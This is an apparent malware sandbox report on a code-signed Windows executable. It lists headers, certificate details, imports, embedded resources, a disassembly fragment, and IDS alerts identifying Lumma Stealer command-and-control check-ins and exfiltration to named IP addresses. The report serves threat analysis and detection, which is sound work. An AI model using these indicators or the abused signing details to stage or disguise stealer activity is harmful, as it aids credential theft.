                                                                                                                                                                                                                                            Time Stamp:0x675221BA [Thu Dec 5 21:57:14 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:0x5e2050, 0x5e2000
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:5d6fd7b1c30a5b028e18dcdea9485e90

                                                                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                                                                            Signature Valid:true
                                                                                                                                                                                                                                            Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                                                                                                                                            Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                            Error Number:0
                                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                                            • 26/11/2024 12:07:48 26/11/2025 12:07:47
                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                            • CN=T H SUPPORT SERVICES LTD, O=T H SUPPORT SERVICES LTD, STREET=Suites 10s And 11s Trafford House Chester Road, PostalCode=M32 0RS, L=Stretford, S=Greater Manchester, C=GB, SERIALNUMBER=07890919, OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                            Thumbprint MD5:99CC43DD50C8C235E6703FBFE86B0302
                                                                                                                                                                                                                                            Thumbprint SHA-1:21297766029D043DFBA740CD5203E45171FC8EAA
                                                                                                                                                                                                                                            Thumbprint SHA-256:0A2CAAF3A1E6490DE521CCCA8452705AF0BD9A4A91D7F02CD8D3588404BCF77C
                                                                                                                                                                                                                                            Serial:502F183B00B497DFC821D09DEB30526B

                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            sub esp, 0Ch
                                                                                                                                                                                                                                            mov dword ptr [0086B618h], 00000000h
                                                                                                                                                                                                                                            call 00007F3B386CF583h
                                                                                                                                                                                                                                            add esp, 0Ch
                                                                                                                                                                                                                                            jmp 00007F3B384EE80Bh
                                                                                                                                                                                                                                            lea esi, dword ptr [esi+00000000h]
                                                                                                                                                                                                                                            sub esp, 1Ch
                                                                                                                                                                                                                                            mov eax, dword ptr [esp+20h]
                                                                                                                                                                                                                                            mov dword ptr [esp], eax
                                                                                                                                                                                                                                            call 00007F3B386E3A26h
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            sete al
                                                                                                                                                                                                                                            add esp, 1Ch
                                                                                                                                                                                                                                            movzx eax, al
                                                                                                                                                                                                                                            neg eax
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            nop
                                                                                                                                                                                                                                            nop
                                                                                                                                                                                                                                            nop
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                            sub esp, 1Ch
                                                                                                                                                                                                                                            mov dword ptr [esp], 0072D000h
                                                                                                                                                                                                                                            call dword ptr [0086FB60h]
                                                                                                                                                                                                                                            sub esp, 04h
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            je 00007F3B384EEBE5h
                                                                                                                                                                                                                                            mov ebx, eax
                                                                                                                                                                                                                                            mov dword ptr [esp], 0072D000h
                                                                                                                                                                                                                                            call dword ptr [0086FBD8h]
                                                                                                                                                                                                                                            sub esp, 04h
                                                                                                                                                                                                                                            mov edi, dword ptr [0086FB6Ch]
                                                                                                                                                                                                                                            mov dword ptr [0086C054h], eax
                                                                                                                                                                                                                                            mov dword ptr [esp+04h], 0072D013h
                                                                                                                                                                                                                                            mov dword ptr [esp], ebx
                                                                                                                                                                                                                                            call edi
                                                                                                                                                                                                                                            sub esp, 08h
                                                                                                                                                                                                                                            mov esi, eax
                                                                                                                                                                                                                                            mov dword ptr [esp+04h], 0072D029h
                                                                                                                                                                                                                                            mov dword ptr [esp], ebx
                                                                                                                                                                                                                                            call edi
                                                                                                                                                                                                                                            sub esp, 08h
                                                                                                                                                                                                                                            mov dword ptr [0071E004h], eax
                                                                                                                                                                                                                                            test esi, esi
                                                                                                                                                                                                                                            je 00007F3B384EEB83h
                                                                                                                                                                                                                                            mov dword ptr [esp+04h], 0084201Ch
                                                                                                                                                                                                                                            mov dword ptr [esp], 0077A0F8h
                                                                                                                                                                                                                                            call esi
                                                                                                                                                                                                                                            mov dword ptr [esp], 00401590h
                                                                                                                                                                                                                                            call 00007F3B384EEAD3h
                                                                                                                                                                                                                                            lea esp, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                                                            pop esi

                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x46f0000x3bd8.idata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4750000xc9200.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x50c6000x2950.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x359fb00x18.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x46f9b00x85c.idata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x10000x31cd280x31ce003b22b1e6738968eb93aea86395f7021dunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .data0x31e0000xe77c0xe80039e9c61d90970028d4af91a719734105False0.5714574353448276data5.3596325539155085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .rdata0x32d0000x4c4c00x4c600f896d149db53c76cb46bbc618020cad0False0.30581590118657936data5.6345238476754185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .eh_fram0x37a0000xc72ac0xc74006599374241c3f36e51c5118481049b5dFalse0.23927741726787954data5.044033366938541IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .bss0x4420000x2c5000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .idata0x46f0000x3bd80x3c00b488a8aee2cf3814357b6f5f38893ec9False0.3610026041666667data5.637024406272127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .CRT0x4730000x340x20086953374f74d9c8ce782dbf0c3749ecbFalse0.0703125Matlab v4 mat-file (little endian) \240\036^, numeric, rows 4198672, columns 00.25861184145657956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .tls0x4740000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .rsrc0x4750000xc92000xc9200eea40cb7b52896e6aabfadf57d1d9990False0.5559657104568054data7.409085150031166IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                            RT_BITMAP0x4757180xc028Device independent bitmap graphic, 128 x 128 x 24, image size 0, resolution 3779 x 3779 px/mEnglishUnited States0.2833184257602862
                                                                                                                                                                                                                                            RT_BITMAP0x4817400x25ba0Device independent bitmap graphic, 164 x 314 x 24, image size 0, resolution 3778 x 3778 px/mEnglishUnited States0.5488196313936633
                                                                                                                                                                                                                                            RT_ICON0x4a72e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192EnglishUnited States0.4115853658536585
                                                                                                                                                                                                                                            RT_ICON0x4a83880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 2048EnglishUnited States0.6922382671480144
                                                                                                                                                                                                                                            RT_ICON0x4a8c300x468Device independent bitmap graphic, 16 x 32 x 32, image size 2048EnglishUnited States0.5904255319148937
                                                                                                                                                                                                                                            RT_ICON0x4a90980x568Device independent bitmap graphic, 16 x 32 x 8, image size 512EnglishUnited States0.5151734104046243
                                                                                                                                                                                                                                            RT_DIALOG0x4a96000x1ccdataEnglishUnited States0.5543478260869565
                                                                                                                                                                                                                                            RT_DIALOG0x4a97cc0x324dataEnglishUnited States0.46766169154228854
                                                                                                                                                                                                                                            RT_DIALOG0x4a9af00xdcdataEnglishUnited States0.6681818181818182
                                                                                                                                                                                                                                            RT_DIALOG0x4a9bcc0x3acdataEnglishUnited States0.4372340425531915
                                                                                                                                                                                                                                            RT_DIALOG0x4a9f780x31adataEnglishUnited States0.4005037783375315
                                                                                                                                                                                                                                            RT_DIALOG0x4aa2940x200dataEnglishUnited States0.419921875
                                                                                                                                                                                                                                            RT_DIALOG0x4aa4940x2b6dataEnglishUnited States0.44668587896253603
                                                                                                                                                                                                                                            RT_DIALOG0x4aa74c0x9badataEnglishUnited States0.3461847389558233
                                                                                                                                                                                                                                            RT_DIALOG0x4ab1080xb9cdataEnglishUnited States0.3495962314939435
                                                                                                                                                                                                                                            RT_DIALOG0x4abca40x286dataEnglishUnited States0.4953560371517028
                                                                                                                                                                                                                                            RT_DIALOG0x4abf2c0x30edataEnglishUnited States0.43478260869565216
                                                                                                                                                                                                                                            RT_DIALOG0x4ac23c0x48cdataEnglishUnited States0.40893470790378006
                                                                                                                                                                                                                                            RT_DIALOG0x4ac6c80x3ccdataEnglishUnited States0.37037037037037035
                                                                                                                                                                                                                                            RT_DIALOG0x4aca940x4f8dataEnglishUnited States0.375
                                                                                                                                                                                                                                            RT_DIALOG0x4acf8c0x11adataEnglishUnited States0.6170212765957447
                                                                                                                                                                                                                                            RT_GROUP_ICON0x4ad0a80x3edataEnglishUnited States0.7903225806451613
                                                                                                                                                                                                                                            RT_VERSION0x4ad0e80x394OpenPGP Secret KeyEnglishUnited States0.4814410480349345
                                                                                                                                                                                                                                            RT_MANIFEST0x4ad47c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                            None0x4ad5fc0x94f1ASCII text, with CRLF line terminatorsEnglishUnited States0.12809147892680112
                                                                                                                                                                                                                                            None0x4b6af00x6444Unicode text, UTF-8 (with BOM) text, with very long lines (410), with CRLF line terminatorsEnglishUnited States0.2990494000311672
                                                                                                                                                                                                                                            None0x4bcf340x8c3cASCII text, with CRLF line terminatorsEnglishUnited States0.3435933147632312
                                                                                                                                                                                                                                            None0x4c5b700xa2RIFF (little-endian) data, Web/P imageEnglishUnited States1.0679012345679013
                                                                                                                                                                                                                                            None0x4c5c140xa4RIFF (little-endian) data, Web/P imageEnglishUnited States1.0670731707317074
                                                                                                                                                                                                                                            None0x4c5cb80xa2RIFF (little-endian) data, Web/P imageEnglishUnited States1.0679012345679013
                                                                                                                                                                                                                                            None0x4c5d5c0xa4RIFF (little-endian) data, Web/P imageEnglishUnited States1.0670731707317074
                                                                                                                                                                                                                                            None0x4c5e000x13501PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.32917009038619555
                                                                                                                                                                                                                                            None0x4d93040x12f6ASCII text, with CRLF line terminatorsEnglishUnited States0.36402966625463534
                                                                                                                                                                                                                                            None0x4da5fc0xcaeaRIFF (little-endian) data, Web/P imageEnglishUnited States0.9969198783351942

                                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                            ADVAPI32.dllAdjustTokenPrivileges, GetFileSecurityW, LookupPrivilegeValueW, OpenProcessToken, RegCloseKey, RegDeleteValueW, RegEnumKeyExW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, SetFileSecurityW
                                                                                                                                                                                                                                            COMCTL32.DLLInitCommonControlsEx, PropertySheetW
                                                                                                                                                                                                                                            COMDLG32.DLLGetOpenFileNameW
                                                                                                                                                                                                                                            GDI32.dllBitBlt, CreateBitmap, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBSection, CreateFontW, CreatePen, CreateRectRgn, CreateRectRgnIndirect, CreateRoundRectRgn, CreateSolidBrush, DeleteDC, DeleteObject, GetObjectW, GetStockObject, GetTextExtentPoint32W, LineTo, MoveToEx, Rectangle, RoundRect, SelectClipRgn, SelectObject, SetBkColor, SetBkMode, SetDCBrushColor, SetLayout, SetStretchBltMode, SetTextColor, StretchBlt, TextOutW
                                                                                                                                                                                                                                            KERNEL32.dllCancelIo, CloseHandle, CompareFileTime, CopyFileExW, CopyFileW, CreateDirectoryW, CreateEventA, CreateEventW, CreateFileA, CreateFileW, CreateIoCompletionPort, CreateMutexW, CreateProcessW, CreateSemaphoreA, CreateSemaphoreW, CreateWaitableTimerW, DeleteCriticalSection, DeleteFileW, DeviceIoControl, DosDateTimeToFileTime, EnterCriticalSection, EnumSystemLanguageGroupsW, ExpandEnvironmentStringsW, FileTimeToDosDateTime, FileTimeToLocalFileTime, FileTimeToSystemTime, FindClose, FindCloseChangeNotification, FindFirstChangeNotificationW, FindFirstFileW, FindNextFileW, FindResourceW, FormatMessageA, FormatMessageW, FreeLibrary, GetCommState, GetCommandLineW, GetComputerNameW, GetConsoleMode, GetConsoleScreenBufferInfo, GetConsoleWindow, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetDateFormatW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetDriveTypeW, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileSize, GetFileSizeEx, GetLastError, GetLogicalDriveStringsW, GetLogicalDrives, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetOverlappedResult, GetProcAddress, GetProcessAffinityMask, GetProcessTimes, GetQueuedCompletionStatus, GetStartupInfoA, GetStdHandle, GetSystemDirectoryW, GetSystemInfo, GetSystemPowerStatus, GetSystemTimeAsFileTime, GetTempFileNameW, GetTempPathW, GetTickCount, GetTimeZoneInformation, GetUserDefaultLCID, GetVersionExW, GetVolumeInformationW, GetWindowsDirectoryW, GlobalAlloc, GlobalLock, GlobalMemoryStatus, GlobalMemoryStatusEx, GlobalUnlock, InitializeCriticalSection, InitializeCriticalSectionAndSpinCount, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, LoadResource, LocalFree, MapViewOfFile, MoveFileExW, MoveFileW, MultiByteToWideChar, OpenEventW, OpenFileMappingW, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, QueueUserAPC, ReadDirectoryChangesW, ReadFile, ReadFileScatter, RegisterWaitForSingleObject, ReleaseMutex, ReleaseSemaphore, RemoveDirectoryW, ResetEvent, SetCommState, SetCommTimeouts, SetConsoleCtrlHandler, SetConsoleMode, SetCurrentDirectoryW, SetEndOfFile, SetEvent, SetFileApisToOEM, SetFileAttributesW, SetFilePointer, SetFilePointerEx, SetFileTime, SetLastError, SetProcessAffinityMask, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, SizeofResource, Sleep, SleepEx, SystemTimeToFileTime, TerminateProcess, TerminateThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, UnmapViewOfFile, UnregisterWaitEx, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, VirtualUnlock, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WideCharToMultiByte, WriteFile, WriteFileGather, lstrcmpW, lstrcmpiW, lstrcpyW
                                                                                                                                                                                                                                            MSIMG32.DLLAlphaBlend
                                                                                                                                                                                                                                            msvcrt.dll___mb_cur_max_func, __doserrno, __getmainargs, __initenv, __lconv_init, __p__acmdln, __p__fmode, __pioinfo, __set_app_type, __setusermatherr, _amsg_exit, _beginthreadex, _cexit, _errno, _fdopen, _filelengthi64, _fileno, _fileno, _fstat64, _getcwd, _initterm, _iob, _isatty, _lock, _lseeki64, _onexit, _read, _setjmp3, _snwprintf, _strcmpi, _strnicmp, _unlock, _vsnwprintf, _wcsicmp, _wfopen, _wfsopen, _wgetcwd, _wmkdir, _wremove, _wrename, _write, _write, _wtoi, abort, atoi, atol, calloc, exit, fclose, feof, ferror, fflush, fgetc, fgetpos, fgetws, fopen, fprintf, fputc, fputs, fputws, fread, free, gmtime, fsetpos, fwprintf, fwrite, getc, getenv, getwc, islower, isspace, isupper, iswctype, iswspace, isxdigit, localeconv, localtime, longjmp, malloc, mbtowc, memchr, memcmp, memcpy, memmove, memset, putc, putwc, rand, realloc, setlocale, setvbuf, signal, sprintf, srand, strcat, strchr, strcmp, strcoll, strcpy, strerror, strftime, strlen, strncmp, strncpy, strrchr, strstr, strtol, strtoul, strxfrm, time, swscanf, system, tolower, toupper, towlower, towupper, ungetc, ungetwc, vfprintf, vswprintf, wcscat, wcschr, wcscmp, wcscoll, wcscpy, wcscspn, wcsftime, wcslen, wcsncat, wcsncpy, wcsrchr, wcsstr, wcstol, wcstombs, wcstoul, wcsxfrm, wctomb
                                                                                                                                                                                                                                            newdev.dllUpdateDriverForPlugAndPlayDevicesW
                                                                                                                                                                                                                                            ole32.dllCoCreateInstance, CoInitialize, CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, CoUninitialize
                                                                                                                                                                                                                                            OLEAUT32.dllSafeArrayDestroy, SafeArrayGetElement, SafeArrayGetLBound, SafeArrayGetUBound, SysAllocString, SysAllocStringLen, SysFreeString, SysStringLen, VariantClear, VariantCopy
                                                                                                                                                                                                                                            SETUPAPI.dllCM_Get_DevNode_Status, SetupDiDestroyDeviceInfoList, SetupDiEnumDeviceInfo, SetupDiGetClassDescriptionW, SetupDiGetClassDevsW, SetupDiGetDeviceInstanceIdW, SetupDiGetDeviceRegistryPropertyW, SetupDiLoadClassIcon
                                                                                                                                                                                                                                            SHELL32.dllCommandLineToArgvW, DragAcceptFiles, DragFinish, DragQueryFileW, SHBrowseForFolderW, SHFormatDrive, SHGetPathFromIDListW, ShellExecuteExW, ShellExecuteW, StrStrIA, StrStrIW
                                                                                                                                                                                                                                            SHLWAPI.dllPathFileExistsW, PathGetDriveNumberW, PathRemoveFileSpecW, StrFormatByteSizeW
                                                                                                                                                                                                                                            USER32.dllAdjustWindowRectEx, BeginPaint, CallWindowProcW, CharUpperW, ClientToScreen, CloseClipboard, CreateDialogParamW, CreateIconIndirect, CreatePopupMenu, CreateWindowExW, DefWindowProcW, DeleteMenu, DestroyIcon, DestroyWindow, DialogBoxParamW, DispatchMessageW, DrawFrameControl, DrawIconEx, DrawTextW, EmptyClipboard, EnableWindow, EndDialog, EndPaint, EnumChildWindows, EnumDisplayDevicesW, FlashWindowEx, GetClassNameW, GetClientRect, GetCursorPos, GetDC, GetDesktopWindow, GetDlgCtrlID, GetDlgItem, GetForegroundWindow, GetIconInfo, GetMenuItemCount, GetMenuItemInfoW, GetMonitorInfoW, GetParent, GetScrollInfo, GetSysColor, GetSystemMenu, GetSystemMetrics, GetWindowInfo, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextW, GetWindowThreadProcessId, InsertMenuItemW, InsertMenuW, InvalidateRect, IsDlgButtonChecked, IsWindow, IsZoomed, KillTimer, LoadCursorW, LoadIconW, MapWindowPoints, MessageBoxW, MonitorFromPoint, MoveWindow, MsgWaitForMultipleObjectsEx, OffsetRect, OpenClipboard, PeekMessageW, PostMessageW, PostQuitMessage, RealGetWindowClassW, RegisterClassExW, ReleaseCapture, ReleaseDC, ScreenToClient, SendDlgItemMessageW, SendMessageW, SetActiveWindow, SetCapture, SetClipboardData, SetCursor, SetCursorPos, SetDlgItemTextW, SetFocus, SetForegroundWindow, SetLayeredWindowAttributes, SetMenuItemInfoW, SetScrollInfo, SetTimer, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowTextA, SetWindowTextW, ShowWindow, SwitchToThisWindow, SystemParametersInfoW, TrackMouseEvent, TrackPopupMenu, TranslateMessage, UnregisterClassW, wsprintfA, wsprintfW, wvsprintfA
                                                                                                                                                                                                                                            WS2_32.dllWSAAddressToStringA, WSAIoctl, WSARecv, WSARecvFrom, WSASend, WSASendTo, WSASocketW, WSAStringToAddressA, freeaddrinfo, getaddrinfo, getnameinfo
                                                                                                                                                                                                                                            WSOCK32.DLLAcceptEx, GetAcceptExSockaddrs, WSACleanup, WSAGetLastError, WSASetLastError, WSAStartup, __WSAFDIsSet, accept, bind, closesocket, connect, gethostname, getpeername, getsockname, getsockopt, htonl, htons, ioctlsocket, listen, ntohl, ntohs, select, setsockopt, shutdown, socket

                                                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                            2025-01-11T11:56:11.578646+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.102.49.254443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:12.096510+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449733104.102.49.254443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:12.691095+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:12.815363+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449734104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:12.815363+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:13.296659+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:13.795382+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449735104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:13.795382+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:14.845942+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:27.599440+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:28.095111+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449743104.21.64.1443TCP
